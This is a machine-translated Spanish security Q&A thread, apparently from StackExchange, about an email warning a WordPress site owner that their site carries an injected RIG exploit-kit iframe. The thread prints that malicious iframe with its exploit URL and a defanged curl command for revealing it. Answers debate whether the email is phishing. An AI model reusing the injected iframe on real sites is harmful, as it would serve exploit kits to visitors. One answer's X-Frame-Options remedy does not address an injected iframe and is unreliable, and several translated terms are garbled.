Alerta de software malicioso del Departamento de Salud y Servicios Humanos de los EE. UU.

Navega tus respuestas
3

He recibido un correo de un determinado Equipo de Respuesta a Incidentes de Seguridad en nombre de un Departamento de los EE. UU. y dice:

  

La URL a continuación se está utilizando actualmente para enviar una carga de software malintencionado a la computadora de una víctima visitante. La carga útil maliciosa actual parece estar en un servidor bajo su control y estamos trabajando en nombre del Departamento de Salud y Servicios Humanos de los EE. UU. (HHS) para eliminar el contenido infeccioso.

     

La URL anterior se ha comprometido, el código que contiene un iframe malicioso que apunta al kit de explotación RIG se ha agregado al sitio web. A continuación se muestra una muestra del iframe que apunta al kit de explotación RIG.

     

3) En un sistema Linux o Mac, abra la Terminal y ejecute el siguiente comando después de eliminar todos los caracteres del corchete: estos: [] - y cambiando todas las instancias de "hXXp" a "http":

     

rizo -H   "Referer: hXXp: // www [.] Ourhostedweb [.] Com / index [.] Php / url-name /"   -H "User-Agent: Mozilla / 5.0 (Windows NT 6.1; WOW64; Trident / 7.0; rv: 11.0) como Gecko" "hXXp: //www.victimweb [.] Com /"

     

Busque el término "iframe" en el código fuente devuelto. Habrá un iframe en la línea 105 cuya URL de origen es el contenido del kit de explotación. Actualmente, este contenido se obtiene de www [.] Ourhostedweb [.] Com. Esto puede cambiar en cualquier momento siempre que el sitio permanezca comprometido.

y el número de línea 105 contiene el siguiente código iframe:

<iframe src="http://gone.MDVEND.COM/?oq=m3WpvAoLeZRbFLhhUPULVAwn45aBlIX_qmnhkjUyRDK1sWA-xOKUTp1u9CWUbI&es_sm=147&q=wXjQMvXcJwDQD4bGMvrESLtNNknQA0KK2Iv2_dqyEoH9fmnihNzUSkr26B2aC&ie=Windows-1252&sourceid=yandex&aqs=yandex.114e103.406b1a7"width="258" height="266"></iframe>

  

Editar   Contacto dado en el correo electrónico Correo electrónico: [email protected]   Oficina: +1.253.590.4100 x0 | Fax: +1.888.239.6932 x0

El sitio se desarrolla utilizando Wordpress.

¿Cuáles son las acciones necesarias que puedo tomar para esto?

    
pregunta mapmalith 23.12.2016 - 08:02
fuente

5 respuestas

6

Con solo leer el primer párrafo, ahora estoy 99.9% seguro de que este es un correo de phishing.

tl; dr : ignóralo.

    
respondido por el thel3l 23.12.2016 - 08:04
fuente
2

Parece que este correo electrónico es probable que sea legítimo.

Si busca en Google "[email protected]", verá a muchas personas durante muchos años hablando sobre cómo han recibido mensajes similares para una amplia gama de vulnerabilidades, que realmente existían en sus servidores.

Mi mejor conjetura es que estos mensajes se generan automáticamente en respuesta al escaneo de Internet de la empresa IID (ahora Infoblox). Detectan varios ataques de seguridad conocidos y activan correos electrónicos a los administradores para notificarlos.

Puede ser parte de sus esfuerzos ser un "buen ciudadano" de Internet y ayudar a limpiar redes de bots y servidores explotables haciendo que los administradores tomen conciencia. O bien, podrían estar bajo contrato por parte de HHS y, si son DDoS, forzados o escaneados desde una dirección; su política podría ser notificar al administrador y apagar ese canal del actor malicioso.

No veo evidencia del código cURL presentado que podría usarse para explotar su servidor. Más bien, le da instrucciones sobre cómo ver cómo su servidor está potencialmente comprometido.

En este caso, creo que la respuesta correcta podría ser: "Gracias".

    
respondido por el Herringbone Cat 19.01.2017 - 23:48
fuente
1

Aparte de los orígenes y la legitimidad del correo electrónico que se ha analizado a fondo, la pregunta real del cartel es, What are the necessary actions I can take for this? .

Para responder a esa pregunta, debes agregar el encabezado X-FRAME-OPTIONS: Deny (o Origin - para permitir solo incrustar desde tu dominio) a tus respuestas HTTP. De esa manera, si un usuario visita la página comprometida que se hace pasar por la suya, el navegador no cargará el iFrame y el esquema de la parte maliciosa fallará.

    
respondido por el Brennen Smith 19.01.2017 - 21:25
fuente
1

En primer lugar, ¿por qué alguna parte en nombre de HHS se está comunicando con usted?

  • ¿Está usted bajo la legislación HIPAA?
  • ¿A quién se dirige exactamente en el correo electrónico?
  • ¿Quién envió el correo electrónico?
  • ¿Desde qué dominio lo están enviando?
  • ¿Ha inspeccionado los encabezados de correo electrónico (fuente)?
  • ¿Qué negocio tiene con HHS?

Observe cómo se le indica en el mismo correo electrónico que le informa de un problema potencial . ¿Dónde hay una entrada pública para tal "exploit"? No hay ninguna referencia a una entrada CVE u otra página informativa similar.

Los números de teléfono también se enumeran públicamente, por lo tanto, ¿quién puede decir que alguien no se limitó a copiarlos?

http://gone.mdvend.com/ devuelve un Server not found , mientras que mdvend.com devuelve una página de Goaddy aparcada.

O bien, ha omitido detalles importantes importantes, o las cosas claramente no se suman, lo que apunta a un ataque de phishing.

enlace

enlace

    
respondido por el dark_st3alth 19.01.2017 - 22:10
fuente
-1

Esta no es la forma en que funciona el sector público. Suplantación de identidad. Eliminar y seguir adelante.

    
respondido por el user1801810 28.12.2016 - 21:52
fuente

Lea otras preguntas en las etiquetas

¿Revelar los códigos de dos factores reduce la seguridad? ¿Es mejor elegir una contraseña aleatoria menos vulnerable?